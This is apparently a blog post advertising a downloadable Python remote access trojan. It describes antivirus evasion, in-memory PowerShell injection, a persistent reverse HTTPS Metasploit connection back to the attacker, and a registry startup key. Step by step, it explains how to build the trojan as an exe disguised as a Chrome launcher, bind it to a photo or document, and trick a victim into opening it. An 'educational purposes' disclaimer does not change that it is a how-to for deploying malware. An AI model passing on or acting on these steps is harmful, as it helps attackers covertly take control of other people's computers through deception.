Advertisements

Python Rootkit – Python RAT To Gain Meterpreter Session

This is a full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine.

ViRu5 life cycle
  • Bypass all anti-virus.
  • Inject a malicious powershell script into memory.
  • Establish a reverse https connection to attacker machine.
  • Check every 10 seconds and make sure that the connection still exists, If not it will re-establish a new connection.
  • Add a startup register key to re-connect to the attacker after reboot.
Steps
  • Update viRu5/source.py parameters with your lhost and lport
  • Change source.py name to GoogleChromeAutoLaunch.py
  • Add GoogleChromeAutoLaunch.py, setup.py and your icon as icon.ico to c:\python27 dir
  • From cmd do
    cd c:\python27
    python setup.py py2exe
    
    
  • Find the RAT exe file in Dist dir.
  • Blind it with any photo, pdf, word or any kind of files
  • Send it to the victim
  • Use your social engineer skills to make him open the file
  • You will receive a reverse https metasoplit connection πŸ™‚
Testing on
  • Windows 7 32bit
  • Windows 7 64bit
  • Windows 8 32bit
  • Windows 8 64bit
  • Windows 8.1 32bit
  • Windows 8.1 64 bit
  • Windows 10 32bit
  • Windows 10 64bit
Disclaimer
This is for Educational purposes ONLY. First of all, this code aims to alarm people about security issues infected unpatched machines.

 

Download Python-Rootkit

Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
Advertisements
Advertisements
%d bloggers like this: